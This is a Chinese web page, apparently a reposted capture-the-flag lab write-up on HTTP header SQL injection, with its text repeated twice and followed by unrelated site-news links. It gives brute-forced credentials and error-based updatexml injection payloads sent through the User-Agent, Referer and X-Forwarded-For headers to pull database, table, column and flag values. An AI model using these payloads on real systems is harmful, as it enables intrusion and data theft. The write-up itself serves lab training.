Header注入漏洞测试
时间:2023年06月12日
/来源:网络
/编辑:佚名
Header注入
header注入依靠head传参($_SERVER)
1、bp抓包爆破出账号密码admin,123456
2、查看源码发现$_SERVER参数通过useragent传参 构造playload:'or updatexml(1,(concat('#',database()),1),1) --qwe 拿到库名head_error
3、构造playload拿到表名,列名,数据
' or updatexml('a',concat('~',(select table_name from information_schema.tables where table_schema='head_error' limit 0,1)),'b'),1) -- qwe //表
' or updatexml('a',concat('~',(select column_name from information_schema.columns where table_name='flag_head' limit 0,1)),'b'),1) -- qwe //列
' or updatexml('a',concat('~',(select flag_h1 from flag_head limit 0,1)),'b'),1) -- qwe
RANK2在refer参数里传参同理可得flag
RANK3在x-forwarded-for里传参同理可得flag
header注入依靠head传参($_SERVER)
1、bp抓包爆破出账号密码admin,123456
2、查看源码发现$_SERVER参数通过useragent传参 构造playload:'or updatexml(1,(concat('#',database()),1),1) --qwe 拿到库名head_error
3、构造playload拿到表名,列名,数据
' or updatexml('a',concat('~',(select table_name from information_schema.tables where table_schema='head_error' limit 0,1)),'b'),1) -- qwe //表
' or updatexml('a',concat('~',(select column_name from information_schema.columns where table_name='flag_head' limit 0,1)),'b'),1) -- qwe //列
' or updatexml('a',concat('~',(select flag_h1 from flag_head limit 0,1)),'b'),1) -- qwe
RANK2在refer参数里传参同理可得flag
RANK3在x-forwarded-for里传参同理可得flag
新闻资讯 更多
- 【建站知识】查询nginx日志状态码大于400的请求并打印整行04-03
- 【建站知识】Python中的logger和handler到底是个什么?04-03
- 【建站知识】python3拉勾网爬虫之(您操作太频繁,请稍后访问)04-03
- 【建站知识】xpath 获取meta里的keywords及description的方法04-03
- 【建站知识】python向上取整以50为界04-03
- 【建站知识】scrapy xpath遇见乱码解决04-03
- 【建站知识】scrapy爬取后中文乱码,解决word转为html 时cp1252编码问题04-03
- 【建站知识】scrapy采集—爬取中文乱码,gb2312转为utf-804-03